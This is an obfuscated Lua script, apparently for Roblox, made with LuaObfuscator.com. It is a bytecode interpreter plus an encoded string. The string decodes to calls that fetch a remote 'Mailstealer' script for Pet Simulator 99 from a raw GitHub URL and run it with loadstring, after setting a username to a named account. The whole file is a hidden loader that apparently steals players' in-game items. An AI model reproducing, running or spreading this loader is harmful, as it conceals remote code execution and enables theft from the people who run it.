--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v82=v2(v0(v30,16));if v19 then local v89=0;local v90;while true do if (v89==1) then return v90;end if (v89==0) then v90=v5(v82,v19);v19=nil;v89=1;end end else return v82;end end end);local function v20(v31,v32,v33)if v33 then local v83=0 -0 ;local v84;while true do if (v83==(0 -0)) then v84=(v31/(((1640 -(1523 + 114)) -1)^(v32-1)))%((4 -2)^(((v33-(620 -(555 + 58 + 6))) -(v32-(932 -(857 + (105 -31))))) + (569 -(367 + 201)))) ;return v84-(v84%(928 -(214 + 713))) ;end end else local v85=(1 + (1066 -(68 + 997)))^(v32-(1 + 0)) ;return (((v31%(v85 + v85))>=v85) and 1) or (877 -(282 + 595)) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0;local v36;local v37;while true do if (v35==1) then return (v37 * (1526 -(226 + 1044))) + v36 ;end if (v35==(0 -0)) then v36,v37=v1(v16,v18,v18 + (119 -(32 + 85)) );v18=v18 + 2 + 0 ;v35=(958 -(892 + 65)) + 0 ;end end end local function v23()local v38=0 -0 ;local v39;local v40;local v41;local v42;while true do if (v38==1) then return (v42 * (31011612 -14234396)) + (v41 * (120312 -54776)) + (v40 * 256) + v39 ;end if (v38==((258 + 92) -(87 + 263))) then v39,v40,v41,v42=v1(v16,v18,v18 + (183 -(67 + 113)) );v18=v18 + 3 + 1 ;v38=2 -(3 -2) ;end end end local function v24()local v43=0;local v44;local v45;local v46;local v47;local v48;local v49;while true do if (((3971 -3017) -(802 + 150))==v43) then v48=v20(v45,21,83 -52 );v49=((v20(v45,57 -25 )==(1 + 0)) and  -(998 -(915 + 82))) or (2 -1) ;v43=2 + 1 ;end if (v43==((2 + 1) -(0 + 0))) then if (v48==(1187 -(876 + 193 + (430 -312)))) then if (v47==(0 -0)) then return v49 * (0 -0) ;else local v98=772 -(201 + 571) ;while true do if (v98==(0 + 0)) then v48=1 -0 ;v46=0 + (0 -0) ;break;end end end elseif (v48==(2838 -(368 + 423))) then return ((v47==(0 -0)) and (v49 * ((19 -(10 + 8))/(0 -0)))) or (v49 * NaN) ;end return v8(v49,v48-(1465 -(416 + 26)) ) * (v46 + (v47/(2^52))) ;end if (v43==0) then v44=v23();v45=v23();v43=3 -2 ;end if (v43==1) then v46=1;v47=(v20(v45,1 + 0 ,35 -15 ) * ((440 -(145 + 293))^(462 -((903 -(814 + 45)) + (1524 -(116 + 1022)))))) + v44 ;v43=1488 -(998 + 488) ;end end end local function v25(v50)local v51=0 -0 ;local v52;local v53;while true do if (v51==((23 -17) -4)) then v53={};for v91=1 + 0 + 0 , #v52 do v53[v91]=v2(v1(v3(v52,v91,v91)));end v51=2 + 0 + (1056 -(87 + 968)) ;end if ((1 + 0)==v51) then v52=v3(v16,v18,(v18 + v50) -(886 -(261 + 624)) );v18=v18 + v50 ;v51=1915 -(1789 + (545 -421)) ;end if (((0 -0) -0)==v51) then v52=nil;if  not v50 then v50=v23();if (v50==(1080 -(1020 + 60))) then return "";end end v51=1424 -(630 + 793) ;end if (v51==3) then return v6(v53);end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v54=0;local v55;local v56;local v57;local v58;local v59;local v60;local v61;while true do if (v54==(990 -(676 + 311))) then v61=nil;while true do local v93=0 + 0 ;while true do if (1==v93) then if (v55==0) then local v99=0 -0 ;while true do if (v99~=(2 -1)) then else v58={};v55=1;break;end if (v99==(114 -(4 + 110))) then v56={};v57={};v99=585 -(57 + 527) ;end end end if (v55~=(1428 -(41 + 1386))) then else local v100=103 -(17 + 86) ;while true do if (v100==(1 + 0)) then v61={};v55=3 -1 ;break;end if (v100~=(0 -0)) then else v59={v56,v57,nil,v58};v60=v23();v100=1 -0 ;end end end break;end if (0==v93) then if (v55==2) then local v101=0;local v102;while true do if (v101==(0 -0)) then v102=0 + 0 ;while true do if (v102==(1 + 0)) then for v158=1,v23() do local v159=0 -0 ;local v160;local v161;local v162;while true do if (v159==(65 -(30 + 35))) then v160=0;v161=nil;v159=1;end if (v159~=1) then else v162=nil;while true do if ((1 + 0)~=v160) then else while true do if (v161==(1257 -(1043 + 214))) then v162=v21();if (v20(v162,3 -2 ,1)~=(1212 -(323 + 889))) then else local v173=0;local v174;local v175;local v176;local v177;local v178;local v179;while true do if (v173~=(2 -1)) then else v176=nil;v177=nil;v173=582 -(361 + 219) ;end if (v173~=(323 -(53 + 267))) then else while true do if (v174==(0 + 0)) then local v183=413 -(15 + 398) ;while true do if (v183~=(982 -(18 + 964))) then else v175=0;v176=nil;v183=3 -2 ;end if (v183~=(1 + 0)) then else v174=1 + 0 ;break;end end end if (2==v174) then v179=nil;while true do if (v175~=2) then else while true do if (v176==(850 -(20 + 830))) then local v189=0 + 0 ;while true do if (v189==(127 -(116 + 10))) then v176=1 + 0 ;break;end if (v189==(738 -(542 + 196))) then local v198=0;while true do if (v198==(0 -0)) then v177=v20(v162,2,1 + 2 );v178=v20(v162,3 + 1 ,3 + 3 );v198=2 -1 ;end if (v198==(2 -1)) then v189=1552 -(1126 + 425) ;break;end end end end end if (v176==1) then local v190=0;local v191;while true do if (v190==0) then v191=0;while true do if (v191==(406 -(118 + 287))) then v176=7 -5 ;break;end if (v191==0) then local v200=0;local v201;while true do if (v200==(1121 -(118 + 1003))) then v201=0;while true do if (v201~=(2 -1)) then else v191=378 -(142 + 235) ;break;end if (v201==0) then local v203=0 -0 ;while true do if (v203==(1 + 0)) then v201=978 -(553 + 424) ;break;end if (v203==(0 -0)) then v179={v22(),v22(),nil,nil};if (v177==0) then local v208=0 + 0 ;local v209;local v210;while true do if (v208==(0 -0)) then v209=0;v210=nil;v208=2 -1 ;end if (v208~=(2 -1)) then else while true do if (v209==0) then v210=0 + 0 ;while true do if (v210==(0 -0)) then v179[756 -(239 + 514) ]=v22();v179[2 + 2 ]=v22();break;end end break;end end break;end end elseif (v177==(1330 -(797 + 532))) then v179[3]=v23();elseif (v177==(2 + 0)) then v179[3]=v23() -(2^16) ;elseif (v177~=(2 + 1)) then else local v213=0;local v214;while true do if (v213~=(0 -0)) then else v214=0;while true do if (v214==(1202 -(373 + 829))) then v179[3]=v23() -((733 -(476 + 255))^16) ;v179[4]=v22();break;end end break;end end end v203=1131 -(369 + 761) ;end end end end break;end end end end break;end end end if (v176==3) then if (v20(v178,2 + 1 ,3)==(1 -0)) then v179[7 -3 ]=v61[v179[242 -(64 + 174) ]];end v56[v158]=v179;break;end if (v176==(1 + 1)) then local v193=0 -0 ;local v194;local v195;while true do if (0~=v193) then else v194=0;v195=nil;v193=1;end if ((337 -(144 + 192))~=v193) then else while true do if (v194==(216 -(42 + 174))) then v195=0 + 0 ;while true do if (v195~=0) then else local v202=0 + 0 ;while true do if (v202~=(0 + 0)) then else if (v20(v178,1505 -(363 + 1141) ,1581 -(1183 + 397) )==(2 -1)) then v179[2]=v61[v179[2]];end if (v20(v178,2 + 0 ,2 + 0 )==(1976 -(1913 + 62))) then v179[3]=v61[v179[3]];end v202=1 + 0 ;end if (v202==1) then v195=1;break;end end end if (v195~=1) then else v176=7 -4 ;break;end end break;end end break;end end end end break;end if (v175==0) then local v185=1933 -(565 + 1368) ;local v186;while true do if (v185==(0 -0)) then v186=1661 -(1477 + 184) ;while true do if (v186~=(0 -0)) then else v176=0;v177=nil;v186=1 + 0 ;end if (v186~=(857 -(564 + 292))) then else v175=1;break;end end break;end end end if (1~=v175) then else local v187=0;local v188;while true do if (v187~=(0 -0)) then else v188=0 -0 ;while true do if (v188==(305 -(244 + 60))) then v175=2;break;end if (v188~=(0 + 0)) then else local v199=476 -(41 + 435) ;while true do if (v199==(1001 -(938 + 63))) then v178=nil;v179=nil;v199=1;end if (v199~=1) then else v188=1;break;end end end end break;end end end end break;end if (v174==(1 + 0)) then local v184=0;while true do if (v184==1) then v174=2;break;end if (v184~=0) then else v177=nil;v178=nil;v184=1126 -(936 + 189) ;end end end end break;end if (v173~=2) then else v178=nil;v179=nil;v173=1 + 2 ;end if (v173~=0) then else v174=0;v175=nil;v173=1614 -(1565 + 48) ;end end end break;end end break;end if (v160==0) then v161=0 + 0 ;v162=nil;v160=1139 -(782 + 356) ;end end break;end end end v55=3;break;end if ((267 -(176 + 91))==v102) then local v152=0 -0 ;while true do if (v152==0) then for v166=1,v60 do local v167=0 -0 ;local v168;local v169;local v170;local v171;while true do if (v167==2) then while true do if (v168~=(1093 -(975 + 117))) then else v171=nil;while true do if (v169~=(1875 -(157 + 1718))) then else local v180=0;local v181;while true do if (v180~=0) then else v181=0 + 0 ;while true do if (0==v181) then v170=v21();v171=nil;v181=1;end if (v181==1) then v169=3 -2 ;break;end end break;end end end if (v169~=(3 -2)) then else if (v170==(1019 -(697 + 321))) then v171=v21()~=0 ;elseif (v170==2) then v171=v24();elseif (v170==3) then v171=v25();end v61[v166]=v171;break;end end break;end if (v168~=(0 -0)) then else local v172=0;while true do if (v172==1) then v168=1 -0 ;break;end if (v172==(0 -0)) then v169=0 + 0 ;v170=nil;v172=1;end end end end break;end if (v167~=0) then else v168=0 -0 ;v169=nil;v167=1;end if ((2 -1)==v167) then v170=nil;v171=nil;v167=1229 -(322 + 905) ;end end end v59[3]=v21();v152=1;end if (v152==(612 -(602 + 9))) then v102=1190 -(449 + 740) ;break;end end end end break;end end end if (v55==3) then for v103=1,v23() do v57[v103-(873 -(826 + 46)) ]=v28();end return v59;end v93=948 -(245 + 702) ;end end end break;end if (v54==0) then v55=0;v56=nil;v54=3 -2 ;end if (v54==(1 + 1)) then v59=nil;v60=nil;v54=3;end if (v54~=(1899 -(260 + 1638))) then else v57=nil;v58=nil;v54=442 -(382 + 58) ;end end end local function v29(v62,v63,v64)local v65=v62[1];local v66=v62[2];local v67=v62[3];return function(...)local v68=v65;local v69=v66;local v70=v67;local v71=v27;local v72=1;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -1 ;local v77={};local v78={};for v86=0,v76 do if (v86>=v70) then v74[v86-v70 ]=v75[v86 + 1 ];else v78[v86]=v75[v86 + 1 ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1];if (v81<=10) then if (v81<=4) then if (v81<=1) then if (v81==0) then v78[v80[2]]();else local v105=v80[2];v78[v105]=v78[v105](v13(v78,v105 + 1 ,v73));end elseif (v81<=2) then local v107=v80[2];v78[v107]=v78[v107](v13(v78,v107 + 1 ,v73));elseif (v81==3) then v64[v80[3]]=v78[v80[2]];else local v124=v80[2];local v125,v126=v71(v78[v124](v13(v78,v124 + 1 ,v80[3])));v73=(v126 + v124) -1 ;local v127=0;for v139=v124,v73 do local v140=0;while true do if (v140==0) then v127=v127 + 1 ;v78[v139]=v125[v127];break;end end end end elseif (v81<=7) then if (v81<=5) then do return;end elseif (v81==6) then v78[v80[2]]=v80[3]~=0 ;else v72=v80[3];end elseif (v81<=8) then v78[v80[2]]=v80[3];elseif (v81==9) then local v130=0;local v131;local v132;while true do if (v130==1) then v78[v131 + 1 ]=v132;v78[v131]=v132[v80[4]];break;end if (v130==0) then v131=v80[2];v132=v78[v80[3]];v130=1;end end elseif ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end elseif (v81<=15) then if (v81<=12) then if (v81==11) then do return;end else v78[v80[2]]=v80[3]~=0 ;end elseif (v81<=13) then local v112=v80[2];local v113=v78[v80[3]];v78[v112 + 1 ]=v113;v78[v112]=v113[v80[4]];elseif (v81>14) then v72=v80[3];else v78[v80[2]]=v80[3];end elseif (v81<=18) then if (v81<=16) then if (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end elseif (v81==17) then if ((v80[3]=="_ENV") or (v80[3]=="getfenv")) then v78[v80[2]]=v64;else v78[v80[2]]=v64[v80[3]];end else v78[v80[2]]();end elseif (v81<=19) then local v117=0;local v118;local v119;local v120;local v121;while true do if (v117==1) then v73=(v120 + v118) -1 ;v121=0;v117=2;end if (v117==0) then v118=v80[2];v119,v120=v71(v78[v118](v13(v78,v118 + 1 ,v80[3])));v117=1;end if (v117==2) then for v148=v118,v73 do v121=v121 + 1 ;v78[v148]=v119[v121];end break;end end elseif (v81>20) then v64[v80[3]]=v78[v80[2]];elseif (v78[v80[2]]==v80[4]) then v72=v72 + 1 ;else v72=v80[3];end v72=v72 + 1 ;end end;end return v29(v28(),{},v17)(...);end v15("LOL!093O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034B3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F45676F72696B7573612F50657453696D756C61746F722O392F6D61696E2F4D61696C737465616C657203083O00557365726E616D65030B3O006B6179616C6973616C6968030A3O004C6F61645363722O656E00143O00120E3O00013O0026143O000B000100020004073O000B0001001211000100033O001211000200043O00200D00020002000500120E000400064O0004000200044O000200013O00022O00120001000100010004073O001300010026143O0001000100010004073O0001000100120E000100083O001203000100074O0006000100013O001203000100093O00120E3O00023O0004073O000100012O000B3O00017O00",v9(),...);
